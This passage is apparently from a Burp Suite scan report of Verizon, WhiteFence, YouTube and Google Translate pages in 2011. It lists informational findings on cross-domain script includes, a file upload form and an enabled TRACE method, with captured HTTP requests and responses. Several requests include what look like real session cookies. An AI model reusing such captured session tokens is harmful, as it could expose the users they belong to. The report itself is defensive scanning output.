GET /b2c/store/accessory HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 50969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/home.js"></script>
...[SNIP]...
</script>
   <script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.74. http://www.verizonwireless.com/b2c/store/controller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:20:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.75. http://www.verizonwireless.com/b2c/vzwfly

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 32537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</noscript>
   

       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

16.76. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.whitefence.com
Path:   /WebObjects/WhiteFence.woa/wa/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebObjects/WhiteFence.woa/wa/login HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
content-length: 8417
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>
       <META name="generator" CONTENT="WebObjects 4.5">
       

   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.
...[SNIP]...
</TITLE>
            <SCRIPT language=JavaScript src="https://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js" type="text/javascript" charset="utf-8"></SCRIPT>
...[SNIP]...
<!-- End SiteCatalyst code version: H.21. -->

<script type="text/javascript" src="//whitefence.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...

16.77. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.whitefence.com
Path:   /WebObjects/WhiteFenceService.woa/wa/forgotPassword

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /WebObjects/WhiteFenceService.woa/wa/forgotPassword HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
set-cookie: cmIdentifier=1; version="1"; expires=Mon, 12-Sep-2011 22:37:08 GMT; path=/; domain=.whitefence.com
content-length: 6130
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>
       

   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.whitefence.com/qstyles/1000001.css">

       <TITLE>Cust
...[SNIP]...
<!-- End SiteCatalyst code version: H.21. -->

<script type="text/javascript" src="//whitefence.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...

16.78. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:09 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pZGJ4MVNHYWdRd0pTTThUdXFGYVdNUkxhSExubThCRDd1U0I2UjFueWRNWFFWaEdjXzFjVi1B -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...
<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vfl7UaQyq.css">


<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js"></script>
...[SNIP]...

16.79. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 286072
Expires: Mon, 05 Sep 2011 22:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:17 GMT
Connection: close
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:37:17 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<meta name="keywords" content="high, speed, internet, plan, service, deal, package, dsl, verizon">

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

16.80. http://www22.verizon.com/jobs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /jobs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobs/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:18:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:42 GMT
Content-Length: 44866
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_1903
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

16.81. http://www22.verizon.com/jobs/search-jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /jobs/search-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobs/search-jobs HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39080

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_-121
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

16.82. http://www22.verizon.com/jobs/verizon-wireless/search-jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /jobs/verizon-wireless/search-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobs/verizon-wireless/search-jobs HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtSa=-; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.1.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_; dtLatC=141|127|1|297

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:19:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:19:01 GMT
Content-Length: 191968
Connection: close
Set-Cookie: companytype=vzw; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_-227
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

16.83. http://www22.verizon.com/residential/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/fiostv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /residential/fiostv?CMP=DMC-CV090057 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/fiostv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660; vsrecentsearches=wss~xss~xss%20sq~~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 131188
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=CA; path=/
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:18:31 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<!--FiOS TV_Landing Page-->
<script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js"></script>
...[SNIP]...

16.84. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Ver
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=rgadevtest"></script>
...[SNIP]...

16.85. https://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 287614
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:38:00 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<meta name="keywords" content="high, speed, internet, plan, service, deal, package, dsl, verizon">

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

17. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:57 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

18. TRACE method is enabled
There are 2 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
